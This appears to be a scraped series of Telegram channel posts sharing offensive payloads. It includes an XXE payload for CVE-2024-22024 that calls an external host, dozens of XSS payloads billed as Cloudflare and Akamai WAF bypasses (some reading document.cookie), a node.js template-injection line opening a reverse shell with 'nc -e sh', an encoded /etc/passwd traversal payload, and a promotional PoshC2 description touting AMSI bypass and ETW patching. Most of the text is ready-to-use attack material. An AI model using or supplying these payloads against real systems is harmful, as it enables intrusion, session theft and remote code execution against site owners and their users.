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CVE-2024-22024 - XXE on Ivanti Connect Secure

payload encoded base64:

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

⚠️ send it to with SAMLRequest parm

#CVE #Payload
XSS of the day : DOM-XSS-SiteMinder


Nuclei tamplete

#Payload #xss

PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.

PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools, allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python2/Python3 implants with payloads written in PowerShell v2 and v4, C++ and C# source code, a variety of executables, DLLs and raw shellcode in addition to a Python2/Python3 payload. These enable C2 functionality on a wide range of devices and operating systems, including Windows, *nix and OSX.

📊 Other notable features of PoshC2 include:
⚪️ Consistent and Cross-Platform support using Docker.
⚪️ Highly configurable payloads, including default beacon times, jitter, kill dates, user agents and more.
⚪️ A large number of payloads generated out-of-the-box which are frequently updated.
⚪️ Shellcode containing in-build AMSI bypass and ETW patching for a high success rate and stealth.
⚪️ Auto-generated Apache Rewrite rules for use in a C2 proxy, protecting your C2 infrastructure and maintaining good operational security.
⚪️ A modular and extensible format allowing users to create or edit C#, PowerShell or Python3 modules which can be run in-memory by the Implants.
⚪️ Notifications on receiving a successful Implant via Pushover or Slack.
⚪️ A comprehensive and maintained contextual help and an intelligent prompt with contextual auto-completion, history and suggestions.
⚪️ Fully encrypted communications, protecting the confidentiality and integrity of the C2 traffic even when communicating over HTTP.
⚪️ Client/Server format allowing multiple team members to utilise a single C2 server.

😸 Github

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🔒 LearnExploit

#Payload #C2 #Proxy #Aware

📣 T.me/BugCod3
📣 T.me/LearnExploit
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This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

Payload :


#Payload #xss
XSS WAF Bypass One payload for all 🔥


#xss #Payload
XSS payload ⚡️

?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >

?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e ( The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag )

<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> ( WAF / Cloudflare Bypass )

”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores ( filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the )

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

<svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>

<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script> ( Encoded by chatGPT )


#XSS #Payload
Stored Xss payload 🔥

Payload for bypass waf:

<Img Src=OnXSS OnError=confirm("@Learnexploit")>

#xss #Bypass #WAF #Payload
Xss Payload 💎


#xss #Payload
XSS could be be triggers in url itself, no need for parameter injection ⚡️




#Xss #Payload
If you discover a node.js template area, you should try triggerable node payload 🔥; require('child_process').exec('nc -e sh ip port');{src:/bin/sh/}

so you can get RCE

#rce #Payload
short XSS polyglot


#Xss #Payload
Stored XSS via cache poisoning ⚡️

"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">

#XSS #Payload
Bypassed strong Akamai WAF

payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

#Waf #Bypass #Payload
payload to bypass Akamai WAF

?foobar=<foo%20bar=%250a%20onclick=<your js code>

#WAF #Bypass #Payload
Forwarded from Root Exploit
Directory Traversal Bypass Payload ⚡️

/../../etc/passwd - 403 Forbidden 🚫

%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd - 200 OK

#Bypass #Payload
@A3l3_KA4 💎
A Cloudflare WAF bypass combining simple (but efficient) tricks


A payload with some obfuscation & filter evasion tricks


#CF #WAF #Bypass #Payload

📣 T.me/BugCod3
📣 T.me/LearnExploit
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